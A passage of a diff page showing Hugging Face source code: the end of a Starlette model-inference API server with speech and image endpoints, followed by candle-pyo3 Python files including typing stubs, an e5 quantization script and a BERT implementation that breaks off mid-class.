+ SPEECH_TO_TEXT_MODEL_IDS = ['facebook/s2t-small-librispeech-asr', 'facebook/s2t-medium-librispeech-asr', 'facebook/s2t-large-librispeech-asr', 'facebook/s2t-small-mustc-en-de-st', 'facebook/s2t-small-mustc-en-es-st', 'facebook/s2t-small-mustc-en-fr-st', 'facebook/s2t-small-mustc-en-it-st', 'facebook/s2t-small-mustc-en-nl-st', 'facebook/s2t-small-mustc-en-pt-st', 'facebook/s2t-small-mustc-en-ro-st', 'facebook/s2t-small-mustc-en-ru-st']
39
+ with open('data/imagenet-simple-labels.json') as f:
40
+ IMAGENET_LABELS: List[str] = json.load(f)
41
+ TTS_MODELS: Dict[str, AnyModel] = {}
42
+ ASR_MODELS: Dict[str, AnyModel] = {}
43
+ SEP_MODELS: Dict[str, AnyModel] = {}
44
+ ASR_HF_MODELS: Dict[str, Tuple[AnyModel, AnyTokenizer]] = {}
45
+ TIMM_MODELS: Dict[str, torch.nn.Module] = {}
46
+
47
+ def home(request: Request):
48
+ return JSONResponse({'ok': True})
49
+
50
+ def health(_):
51
+ process = psutil.Process(os.getpid())
52
+ mem_info = process.memory_info()
53
+ return JSONResponse({**process.as_dict(attrs=['memory_percent']), 'rss': mem_info.rss})
54
+
55
+ def list_models(_):
56
+ all_models = {**TTS_MODELS, **ASR_MODELS, **SEP_MODELS, **{k: v[0] for (k, v) in ASR_HF_MODELS.items()}, **TIMM_MODELS}
57
+ return JSONResponse({k: v.__class__.__name__ for (k, v) in all_models.items()})
58
+
59
+ async def post_inference_tts(request: Request, model: AnyModel):
60
+ start = time.time()
61
+ try:
62
+ body = await request.json()
63
+ except:
64
+ return JSONResponse(status_code=400, content='Invalid JSON body')
65
+ print(body)
66
+ text = body['text']
67
+ outputs = model(text)
68
+ speech = outputs[0]
69
+ with tempfile.NamedTemporaryFile(suffix='.wav', delete=False) as tmp:
70
+ soundfile.write(tmp.name, speech.numpy(), model.fs, 'PCM_16')
71
+ return FileResponse(tmp.name, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)}, background=BackgroundTask(lambda f: os.unlink(f), tmp.name))
72
+
73
+ async def post_inference_asr(request: Request, model_id: str):
74
+ start = time.time()
75
+ content_type = request.headers['content-type'].split(';')[0]
76
+ if content_type == 'application/json':
77
+ body = await request.json()
78
+ if 'url' not in body:
79
+ return JSONResponse({'ok': False, 'message': f'Invalid json, no url key'}, status_code=400)
80
+ url = body['url']
81
+ r = requests.get(url, stream=True)
82
+ file_ext: Optional[str] = guess_extension(r.headers.get('content-type', ''), strict=False)
83
+ blob = r.content
84
+ else:
85
+ file_ext: Optional[str] = guess_extension(content_type, strict=False)
86
+ try:
87
+ blob = await request.body()
88
+ except Exception as exc:
89
+ return JSONResponse({'ok': False, 'message': f'Invalid body: {exc}'}, status_code=400)
90
+ with tempfile.NamedTemporaryFile(suffix=file_ext) as tmp:
91
+ print(tmp, tmp.name)
92
+ tmp.write(blob)
93
+ tmp.flush()
94
+ try:
95
+ (speech, rate) = soundfile.read(tmp.name, dtype='float32')
96
+ except:
97
+ try:
98
+ (speech, rate) = librosa.load(tmp.name, sr=16000)
99
+ except Exception as exc:
100
+ return JSONResponse({'ok': False, 'message': f'Invalid audio: {exc}'}, status_code=400)
101
+ if len(speech.shape) > 1:
102
+ speech = speech[:, 0]
103
+ if rate != 16000:
104
+ speech = librosa.resample(speech, rate, 16000)
105
+ if model_id in ASR_HF_MODELS:
106
+ if model_id in SPEECH_TO_TEXT_MODEL_IDS:
107
+ (model, processor) = ASR_HF_MODELS.get(model_id)
108
+ inputs = processor(speech, return_tensors='pt')
109
+ generated_ids = model.generate(input_ids=inputs['features'], attention_mask=inputs['attention_mask'])
110
+ text = processor.batch_decode(generated_ids, skip_special_tokens=True)[0]
111
+ else:
112
+ (model, tokenizer) = ASR_HF_MODELS.get(model_id)
113
+ input_values = tokenizer(speech, return_tensors='pt').input_values
114
+ logits = model(input_values).logits
115
+ predicted_ids = torch.argmax(logits, dim=-1)
116
+ text = tokenizer.decode(predicted_ids[0])
117
+ else:
118
+ model = ASR_MODELS.get(model_id)
119
+ outputs = model(speech)
120
+ (text, *_) = outputs[0]
121
+ print(text)
122
+ return JSONResponse({'text': text}, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)})
123
+
124
+ async def post_inference_sep(request: Request, model: AnyModel):
125
+ start = time.time()
126
+ try:
127
+ body = await request.body()
128
+ with tempfile.NamedTemporaryFile() as tmp:
129
+ tmp.write(body)
130
+ tmp.flush()
131
+ (wav, fs) = separate._load_audio(tmp.name)
132
+ except Exception as exc:
133
+ return JSONResponse({'ok': False, 'message': f'Invalid body: {exc}'}, status_code=400)
134
+ wav = separate._resample(wav[:, 0], orig_sr=fs, target_sr=int(model.sample_rate))
135
+ (est_srcs,) = separate.numpy_separate(model, wav.reshape((1, 1, -1)))
136
+ est = est_srcs[0]
137
+ with tempfile.NamedTemporaryFile(suffix='.wav', delete=False) as tmp:
138
+ soundfile.write(tmp.name, est, int(model.sample_rate), 'PCM_16')
139
+ return FileResponse(tmp.name, headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)}, background=BackgroundTask(lambda f: os.unlink(f), tmp.name))
140
+
141
+ async def post_inference_timm(request: Request, model: torch.nn.Module):
142
+ start = time.time()
143
+ content_type = request.headers['content-type']
144
+ if content_type == 'application/json':
145
+ body = await request.json()
146
+ if 'url' not in body:
147
+ return JSONResponse({'ok': False, 'message': f'Invalid json, no url key'}, status_code=400)
148
+ url = body['url']
149
+ img = Image.open(requests.get(url, stream=True).raw)
150
+ else:
151
+ try:
152
+ body = await request.body()
153
+ img = Image.open(BytesIO(body))
154
+ except Exception as exc:
155
+ print(exc)
156
+ return JSONResponse({'ok': False, 'message': f'Unable to open image from request'}, status_code=400)
157
+ img = img.convert('RGB')
158
+ config = model.default_cfg
159
+ if isinstance(config['input_size'], tuple):
160
+ img_size = config['input_size'][-2:]
161
+ else:
162
+ img_size = config['input_size']
163
+ transform = timm.data.transforms_factory.transforms_imagenet_eval(img_size=img_size, interpolation=config['interpolation'], mean=config['mean'], std=config['std'])
164
+ input_tensor = transform(img)
165
+ input_tensor = input_tensor.unsqueeze(0)
166
+ with torch.no_grad():
167
+ output = model(input_tensor)
168
+ probs = output.squeeze(0).softmax(dim=0)
169
+ (values, indices) = torch.topk(probs, k=5)
170
+ labels = [IMAGENET_LABELS[i] for i in indices]
171
+ return JSONResponse([{'label': label, 'score': float(values[i])} for (i, label) in enumerate(labels)], headers={HF_HEADER_COMPUTE_TIME: '{:.3f}'.format(time.time() - start)})
172
+
173
+ async def post_inference(request: Request) -> JSONResponse:
174
+ model_id = request.path_params['model_id']
175
+ if model_id in TTS_MODELS:
176
+ model = TTS_MODELS.get(model_id)
177
+ return await post_inference_tts(request, model)
178
+ if model_id in ASR_MODELS or model_id in ASR_HF_MODELS:
179
+ return await post_inference_asr(request, model_id)
180
+ if model_id in SEP_MODELS:
181
+ model = SEP_MODELS.get(model_id)
182
+ return await post_inference_sep(request, model)
183
+ if model_id in TIMM_MODELS:
184
+ model = TIMM_MODELS.get(model_id)
185
+ return await post_inference_timm(request, model)
186
+ return JSONResponse(status_code=404, content='Unknown or unsupported model')
187
+ routes = [Route('/', home), Route('/health', health), Route('/models', list_models), Route('/models/{model_id:path}', post_inference, methods=['POST'])]
188
+ middlewares = [Middleware(CORSMiddleware, allow_origins=['*'], allow_methods=['*'], allow_headers=['*'], expose_headers=['*'])]
189
+ app = Starlette(debug=True, routes=routes, middleware=middlewares)
190
+ if __name__ == '__main__':
191
+ start_time = time.time()
192
+ for model_id in (EXAMPLE_TTS_EN_MODEL_ID, EXAMPLE_TTS_ZH_MODEL_ID):
193
+ model = Text2Speech.from_pretrained(model_id, device='cpu')
194
+ TTS_MODELS[model_id] = model
195
+ for model_id in (EXAMPLE_ASR_EN_MODEL_ID,):
196
+ model = Speech2Text.from_pretrained(model_id, device='cpu')
197
+ ASR_MODELS[model_id] = model
198
+ for model_id in (EXAMPLE_SEP_ENH_MODEL_ID, EXAMPLE_SEP_SEP_MODEL_ID):
199
+ model = AsteroidBaseModel.from_pretrained(model_id)
200
+ SEP_MODELS[model_id] = model
201
+ for model_id in WAV2VEV2_MODEL_IDS:
202
+ model = Wav2Vec2ForCTC.from_pretrained(model_id)
203
+ tokenizer = Wav2Vec2Tokenizer.from_pretrained(model_id)
204
+ ASR_HF_MODELS[model_id] = (model, tokenizer)
205
+ for model_id in SPEECH_TO_TEXT_MODEL_IDS:
206
+ model = Speech2TextForConditionalGeneration.from_pretrained(model_id)
207
+ processor = Speech2TextProcessor.from_pretrained(model_id)
208
+ ASR_HF_MODELS[model_id] = (model, processor)
209
+ TIMM_MODELS['julien-c/timm-dpn92'] = timm.create_model('dpn92', pretrained=True).eval()
210
+ TIMM_MODELS['sgugger/resnet50d'] = timm.create_model('resnet50d', pretrained=True).eval()
211
+ print('models.loaded', time.time() - start_time)
212
+ uvicorn.run(app, host='0.0.0.0', port=8000, timeout_keep_alive=0)
213
+
huggingface_autotrain-advanced.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_candle.txt ADDED
@@ -0,0 +1,1540 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: candle-main/candle-pyo3/_additional_typing/__init__.py
2
+ from typing import Union, Sequence
3
+
4
+ class Tensor:
5
+
6
+ def __add__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
7
+ pass
8
+
9
+ def __radd__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
10
+ pass
11
+
12
+ def __sub__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
13
+ pass
14
+
15
+ def __truediv__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
16
+ pass
17
+
18
+ def __mul__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
19
+ pass
20
+
21
+ def __rmul__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
22
+ pass
23
+
24
+ def __richcmp__(self, rhs: Union['Tensor', 'Scalar'], op) -> 'Tensor':
25
+ pass
26
+
27
+ def __getitem__(self, index: Union['Index', 'Tensor', Sequence['Index']]) -> 'Tensor':
28
+ pass
29
+
30
+ def __eq__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
31
+ pass
32
+
33
+ def __ne__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
34
+ pass
35
+
36
+ def __lt__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
37
+ pass
38
+
39
+ def __le__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
40
+ pass
41
+
42
+ def __gt__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
43
+ pass
44
+
45
+ def __ge__(self, rhs: Union['Tensor', 'Scalar']) -> 'Tensor':
46
+ pass
47
+
48
+ # File: candle-main/candle-pyo3/e5.py
49
+ from candle.utils import load_safetensors, save_gguf, load_gguf
50
+ from candle.models.bert import BertModel, Config
51
+ import json
52
+ from candle import Tensor
53
+ from tqdm import tqdm
54
+ from dataclasses import fields
55
+ import os
56
+ import time
57
+ from huggingface_hub import hf_hub_download
58
+ from transformers import BertTokenizer, AutoModel
59
+ import torch
60
+ if __name__ == '__main__':
61
+ model_name = 'intfloat/e5-small-v2'
62
+ model_file = hf_hub_download(repo_id=model_name, filename='model.safetensors')
63
+ config_file = hf_hub_download(repo_id=model_name, filename='config.json')
64
+ tensors = load_safetensors(model_file)
65
+ config = Config()
66
+ with open(config_file, 'r') as f:
67
+ raw_config = json.load(f)
68
+ for field in fields(config):
69
+ if field.name in raw_config:
70
+ setattr(config, field.name, raw_config[field.name])
71
+ model = BertModel(config)
72
+ model.load_state_dict(tensors)
73
+ hf_model = AutoModel.from_pretrained(model_name)
74
+ tokenizer = BertTokenizer.from_pretrained(model_name)
75
+ sentences = ['The cat sits outside', 'A man is playing guitar', 'I love pasta', 'The new movie is awesome', 'The cat plays in the garden', 'A woman watches TV', 'The new movie is so great', 'Do you like pizza?']
76
+
77
+ def average_pool(last_hidden_states: torch.Tensor, attention_mask: torch.Tensor):
78
+ last_hidden = last_hidden_states.masked_fill(~attention_mask[..., None].bool(), 0.0)
79
+ return last_hidden.sum(dim=1) / attention_mask.sum(dim=1)[..., None]
80
+ tokenized = tokenizer(sentences, padding=True)
81
+ tokens = Tensor(tokenized['input_ids'])
82
+ token_type_ids = Tensor(tokenized['token_type_ids'])
83
+ attention_mask = Tensor(tokenized['attention_mask'])
84
+ (encoder_out, _) = model.forward(tokens, token_type_ids, attention_mask=attention_mask)
85
+ hf_tokenized = tokenizer(sentences, padding=True, return_tensors='pt')
86
+ hf_result = hf_model(**hf_tokenized)['last_hidden_state']
87
+ hf_pooled = average_pool(hf_result, hf_tokenized['attention_mask'])
88
+ candle_pooled = average_pool(torch.tensor(encoder_out.values()), hf_tokenized['attention_mask'])
89
+ loss = torch.nn.L1Loss()
90
+ error = loss(hf_pooled, candle_pooled).mean().item()
91
+ print(f'Mean error between torch-reference and candle: {error}')
92
+ quantized_tensors = {}
93
+ for (name, tensor) in tqdm(tensors.items(), desc='Quantizing tensors to 5-Bit'):
94
+ if name.endswith('weight') and ('attention' in name or 'intermediate' in name or 'output' in name):
95
+ if tensor.shape[-1] % 256 == 0:
96
+ new_tensor = tensor.quantize('q4k')
97
+ else:
98
+ new_tensor = tensor.quantize('q5_0')
99
+ quantized_tensors[name] = new_tensor
100
+ else:
101
+ quantized_tensors[name] = tensor.quantize('q8_0')
102
+ print(f'Saving quantized tensors')
103
+ config_to_save = {k: v for (k, v) in config.__dict__.items() if v is not None}
104
+ quantized_model_file = 'e5_small.gguf'
105
+ save_gguf(quantized_model_file, quantized_tensors, config_to_save)
106
+ file_size_mb = os.path.getsize(model_file) / 1024 / 1024
107
+ file_size_mb_compressed = os.path.getsize(quantized_model_file) / 1024 / 1024
108
+ print(f'Compressed model from {file_size_mb:.2f} MB to {file_size_mb_compressed:.2f} MB')
109
+ (tensors, raw_config) = load_gguf(quantized_model_file)
110
+ config = Config()
111
+ for field in fields(config):
112
+ if field.name in raw_config:
113
+ setattr(config, field.name, raw_config[field.name])
114
+ model = BertModel(config)
115
+ model.load_state_dict(tensors, strict=False)
116
+ (encoder_out_2, pooled_output_2) = model.forward(tokens, token_type_ids)
117
+ (encoder_out_2, pooled_output_2) = (encoder_out_2.to_device('cpu'), pooled_output_2.to_device('cpu'))
118
+ candle_pooled_2 = average_pool(torch.tensor(encoder_out_2.values()), hf_tokenized['attention_mask'])
119
+ error = loss(hf_pooled, candle_pooled_2).mean().item()
120
+ print(f'Mean error between torch-reference and quantized-candle: {error}')
121
+
122
+ # File: candle-main/candle-pyo3/py_src/candle/__init__.py
123
+ import logging
124
+ try:
125
+ from .candle import *
126
+ except ImportError as e:
127
+ logging.warning('DLLs were not bundled with this package. Trying to locate them...')
128
+ import os
129
+ import platform
130
+
131
+ def locate_cuda_dlls():
132
+ logging.warning('Locating CUDA DLLs...')
133
+ cuda_path = os.environ.get('CUDA_PATH', None)
134
+ if cuda_path:
135
+ logging.warning(f'Found CUDA_PATH environment variable: {cuda_path}')
136
+ if platform.system() == 'Windows':
137
+ cuda_path = os.path.join(cuda_path, 'bin')
138
+ else:
139
+ cuda_path = os.path.join(cuda_path, 'lib64')
140
+ logging.warning(f'Adding {cuda_path} to DLL search path...')
141
+ os.add_dll_directory(cuda_path)
142
+ else:
143
+ logging.warning('CUDA_PATH environment variable not found!')
144
+
145
+ def locate_mkl_dlls():
146
+ oneapi_root = os.environ.get('ONEAPI_ROOT', None)
147
+ if oneapi_root:
148
+ if platform.system() == 'Windows':
149
+ mkl_path = os.path.join(oneapi_root, 'compiler', 'latest', 'windows', 'redist', 'intel64_win', 'compiler')
150
+ else:
151
+ mkl_path = os.path.join(oneapi_root, 'mkl', 'latest', 'lib', 'intel64')
152
+ logging.warning(f'Adding {mkl_path} to DLL search path...')
153
+ os.add_dll_directory(mkl_path)
154
+ else:
155
+ logging.warning('ONEAPI_ROOT environment variable not found!')
156
+ locate_cuda_dlls()
157
+ locate_mkl_dlls()
158
+ try:
159
+ from .candle import *
160
+ except ImportError as inner_e:
161
+ raise ImportError('Could not locate DLLs. Please check the documentation for more information.')
162
+ __doc__ = candle.__doc__
163
+ if hasattr(candle, '__all__'):
164
+ __all__ = candle.__all__
165
+
166
+ # File: candle-main/candle-pyo3/py_src/candle/models/bert.py
167
+ from dataclasses import dataclass
168
+ from typing import Optional
169
+ from candle.nn import Module, Embedding, LayerNorm, Linear, ModuleList
170
+ from candle import Tensor
171
+ import candle
172
+ import candle.functional as F
173
+ from typing import Tuple, Optional
174
+
175
+ @dataclass
176
+ class Config:
177
+ vocab_size: int = 30522
178
+ hidden_size: int = 768
179
+ num_hidden_layers: int = 12
180
+ num_attention_heads: int = 12
181
+ intermediate_size: int = 3072
182
+ hidden_act: str = 'gelu'
183
+ hidden_dropout_prob: float = 0.1
184
+ max_position_embeddings: int = 512
185
+ type_vocab_size: int = 2
186
+ initializer_range: float = 0.02
187
+ layer_norm_eps: float = 1e-12
188
+ pad_token_id: int = 0
189
+ position_embedding_type: str = 'absolute'
190
+ use_cache: bool = True
191
+ classifier_dropout: Optional[float] = None
192
+ model_type: Optional[str] = 'bert'
193
+
194
+ class BertSelfAttention(Module):
195
+
196
+ def __init__(self, config: Config) -> None:
197
+ super().__init__()
198
+ self.num_attention_heads = config.num_attention_heads
199
+ self.attention_head_size = int(config.hidden_size / self.num_attention_heads)
200
+ all_head_size = int(config.num_attention_heads * self.attention_head_size)
201
+ hidden_size = config.hidden_size
202
+ self.query = Linear(hidden_size, all_head_size)
203
+ self.key = Linear(hidden_size, all_head_size)
204
+ self.value = Linear(hidden_size, all_head_size)
205
+
206
+ def transpose_for_scores(self, x: Tensor) -> Tensor:
207
+ new_x_shape = x.shape[:-1] + (self.num_attention_heads, self.attention_head_size)
208
+ x = x.reshape(new_x_shape).transpose(1, 2)
209
+ return x.contiguous()
210
+
211
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
212
+ query = self.query.forward(hidden_states)
213
+ key = self.key.forward(hidden_states)
214
+ value = self.value.forward(hidden_states)
215
+ query = self.transpose_for_scores(query)
216
+ key = self.transpose_for_scores(key)
217
+ value = self.transpose_for_scores(value)
218
+ attention_scores = query.matmul(key.t())
219
+ attention_scores = attention_scores / float(self.attention_head_size) ** 0.5
220
+ if attention_mask is not None:
221
+ (b_size, _, _, last_dim) = attention_scores.shape
222
+ attention_scores = attention_scores.broadcast_add(attention_mask.reshape((b_size, 1, 1, last_dim)))
223
+ attention_probs = F.softmax(attention_scores, dim=-1)
224
+ context_layer = attention_probs.matmul(value)
225
+ context_layer = context_layer.transpose(1, 2).contiguous()
226
+ context_layer = context_layer.flatten_from(-2)
227
+ return context_layer
228
+
229
+ class BertSelfOutput(Module):
230
+
231
+ def __init__(self, config: Config) -> None:
232
+ super().__init__()
233
+ self.dense = Linear(config.hidden_size, config.hidden_size)
234
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
235
+
236
+ def forward(self, hidden_states: Tensor, input_tensor: Tensor) -> Tensor:
237
+ hidden_states = self.dense.forward(hidden_states)
238
+ return self.LayerNorm.forward(hidden_states + input_tensor)
239
+
240
+ class BertAttention(Module):
241
+
242
+ def __init__(self, config: Config) -> None:
243
+ super().__init__()
244
+ self.self = BertSelfAttention(config)
245
+ self.output = BertSelfOutput(config)
246
+
247
+ def forward(self, hidden_states: Tensor, attention_mask: None) -> Tensor:
248
+ self_outputs = self.self.forward(hidden_states, attention_mask=attention_mask)
249
+ attention_output = self.output.forward(self_outputs, hidden_states)
250
+ return attention_output
251
+
252
+ class BertIntermediate(Module):
253
+
254
+ def __init__(self, config: Config) -> None:
255
+ super().__init__()
256
+ self.dense = Linear(config.hidden_size, config.intermediate_size)
257
+ self.act = F.gelu if config.hidden_act == 'gelu' else F.relu
258
+
259
+ def forward(self, hidden_states: Tensor) -> Tensor:
260
+ hidden_states = self.dense.forward(hidden_states)
261
+ return self.act(hidden_states)
262
+
263
+ class BertOutput(Module):
264
+
265
+ def __init__(self, config: Config) -> None:
266
+ super().__init__()
267
+ self.dense = Linear(config.intermediate_size, config.hidden_size)
268
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
269
+
270
+ def forward(self, hidden_states: Tensor, input_tensor: Tensor) -> Tensor:
271
+ hidden_states = self.dense.forward(hidden_states)
272
+ return self.LayerNorm.forward(hidden_states + input_tensor)
273
+
274
+ class BertLayer(Module):
275
+
276
+ def __init__(self, config: Config) -> None:
277
+ super().__init__()
278
+ self.attention = BertAttention(config)
279
+ self.intermediate = BertIntermediate(config)
280
+ self.output = BertOutput(config)
281
+
282
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
283
+ attention_output = self.attention.forward(hidden_states, attention_mask=attention_mask)
284
+ intermediate_output = self.intermediate.forward(attention_output)
285
+ layer_output = self.output.forward(intermediate_output, attention_output)
286
+ return layer_output
287
+
288
+ class BertEncoder(Module):
289
+
290
+ def __init__(self, config: Config) -> None:
291
+ super().__init__()
292
+ self.layer = ModuleList()
293
+ for _ in range(config.num_hidden_layers):
294
+ self.layer.append(BertLayer(config))
295
+
296
+ def forward(self, hidden_states: Tensor, attention_mask=None) -> Tensor:
297
+ for l in self.layer:
298
+ hidden_states = l.forward(hidden_states, attention_mask=attention_mask)
299
+ return hidden_states
300
+
301
+ class BertEmbeddings(Module):
302
+
303
+ def __init__(self, config: Config) -> None:
304
+ super().__init__()
305
+ self.word_embeddings = Embedding(config.vocab_size, config.hidden_size)
306
+ self.position_embeddings = Embedding(config.max_position_embeddings, config.hidden_size)
307
+ self.token_type_embeddings = Embedding(config.type_vocab_size, config.hidden_size)
308
+ self.LayerNorm = LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
309
+ self.position_ids = candle.Tensor(list(range(config.max_position_embeddings))).reshape((1, config.max_position_embeddings))
310
+
311
+ def forward(self, input_ids: Tensor, token_type_ids: Tensor) -> Tensor:
312
+ (_batch_size, seq_len) = input_ids.shape
313
+ input_embeddings = self.word_embeddings.forward(input_ids)
314
+ token_type_embeddings = self.token_type_embeddings.forward(token_type_ids)
315
+ embeddings: Tensor = input_embeddings + token_type_embeddings
316
+ position_ids = list(range(seq_len))
317
+ position_ids = Tensor(position_ids).to_dtype(input_ids.dtype).to_device(input_ids.device)
318
+ embeddings = embeddings.broadcast_add(self.position_embeddings.forward(position_ids))
319
+ embeddings = self.LayerNorm(embeddings)
320
+ return embeddings
321
+
322
+ class BertPooler(Module):
323
+
324
+ def __init__(self, config: Config) -> None:
325
+ super().__init__()
326
+ self.dense = Linear(config.hidden_size, config.hidden_size)
327
+ self.activation = F.tanh
328
+
329
+ def forward(self, hidden_states: Tensor) -> Tensor:
330
+ first_token_tensor = hidden_states[:, 0]
331
+ pooled_output = self.dense.forward(first_token_tensor)
332
+ pooled_output = self.activation(pooled_output)
333
+ return pooled_output
334
+
335
+ def masked_fill(on_false: float, mask: Tensor, on_true: float):
336
+ shape = mask.shape
337
+ on_true = candle.tensor(on_true).broadcast_as(shape)
338
+ on_false = candle.tensor(on_false).broadcast_as(shape)
339
+ return mask.where_cond(on_true, on_false)
340
+
341
+ class BertModel(Module):
342
+
343
+ def __init__(self, config: Config, add_pooling_layer=True) -> None:
344
+ super().__init__()
345
+ self.config = config
346
+ self.embeddings = BertEmbeddings(config)
347
+ self.encoder = BertEncoder(config)
348
+ self.pooler = BertPooler(config) if add_pooling_layer else None
349
+
350
